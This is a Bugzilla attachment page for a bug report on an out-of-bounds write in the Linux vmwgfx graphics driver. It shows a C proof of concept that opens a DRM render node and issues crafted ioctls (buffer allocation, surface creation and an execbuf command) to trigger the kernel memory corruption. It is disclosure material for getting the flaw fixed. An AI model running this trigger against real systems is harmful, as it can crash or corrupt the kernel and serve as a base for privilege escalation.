Bugzilla – Attachment 385 Details for
Bug 2070
There is an out-of-bounds write vulnerability in vmwgfx driver
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
poc
poc.c (text/plain), 3.10 KB, created by
Ezrak1e
on 2022-09-06 14:10:47 UTC
(
hide
)
Description:
poc
Filename:
MIME Type:
Creator:
Ezrak1e
Created:
2022-09-06 14:10:47 UTC
Size:
3.10 KB
patch
obsolete
>#include <stdio.h> >#include <string.h> >#include <unistd.h> >#include <errno.h> > >#include <linux/if_tun.h> >#include <net/if.h> >#include <sys/ioctl.h> >#include <sys/types.h> >#include <sys/stat.h> >#include <fcntl.h> >#include <pthread.h> >#include <sys/socket.h> >#include <string.h> >#include <unistd.h> >#include <stdlib.h> >#include <sys/ioctl.h> >#include <errno.h> >#include <stdio.h> >#include <fcntl.h> >#include <pthread.h> >#include <stdio.h> >#include <sys/types.h> >#include <stdint.h> >#include <netinet/ip.h> >#include <sys/resource.h> >#include <sys/syscall.h> >#include <limits.h> >#include <sys/mman.h> > >#include <linux/fs.h> >int fd = 0; >typedef struct mixer >{ > int index; > int fd; > char *msg; >}mixer_t; > >struct drm_vmw_surface_create_req { > __u32 flags; > __u32 format; > __u32 mip_levels[6]; > __u64 size_addr; > __s32 shareable; > __s32 scanout; >}; >struct drm_vmw_execbuf_arg { > __u64 commands; > __u32 command_size; > __u32 throttle_us; > __u64 fence_rep; > __u32 version; > __u32 flags; > __u32 context_handle; > __s32 imported_fence_fd; >}; >void init(){ >if ((fd = open("/dev/dri/renderD128", O_RDWR)) == -1) > { > printf("open tun failed: %s\n", strerror(errno)); > return -1; > } > >} >void poc(int handle,int sid){ >char *vaddr=(unsigned long)mmap(NULL, > 0x2000, > PROT_READ | PROT_WRITE, > MAP_PRIVATE | MAP_ANONYMOUS | MAP_POPULATE /* important */, >-1, 0); > > if (mlock((void *)vaddr, 0x2000) == -1) { > printf("[-] failed to lock memory (%s), aborting!\n", > strerror(errno)); > } > > memset(vaddr,"a",0x2000); >int cmd[0x1000]={0}; >cmd[0]=1044; >cmd[1]=0x50; >cmd[2]=handle; >cmd[3]=0; >cmd[5]=sid; >cmd[6]=0; >cmd[7]=0; >cmd[13]=1; >cmd[12]=0x2000; >cmd[14]=1; >cmd[19]=12; >struct drm_vmw_execbuf_arg arg={0}; > arg.commands=cmd; > arg.command_size=0x100; > arg.version=1; > if (ioctl(fd, 0x4028644C, &arg) == -1) > { > printf("ioctl tun failed: %s\n", strerror(errno)); > return -1; > } > >} >int alloc_bo(){ > >int arg[0x10]={0}; >arg[0]=0x10000; >if (ioctl(fd, 0xC0186441, &arg) == -1) > { > printf("ioctl tun failed: %s\n", strerror(errno)); > return -1; > } > return arg[2]; >} > >int create_surface(){ >int buf[0x100]={0}; >buf[0]=64; >buf[1]=64; >buf[2]=64; > >struct drm_vmw_surface_create_req arg={0}; >arg.flags=0; >arg.format=2; >arg.mip_levels[0]=1; >arg.size_addr=buf; >arg.shareable=0; >arg.scanout=0x10; > >if (ioctl(fd, 0xC0306449, &arg) == -1) > { > printf("ioctl tun failed: %s\n", strerror(errno)); > return -1; > } >return arg.flags; >} >int main(int ac, char **argv) >{ >init(); >int handle=alloc_bo(); > int sid = create_surface(); > printf("%d",sid); > poc(handle,sid); > >} > >
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=385">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 2070
: 385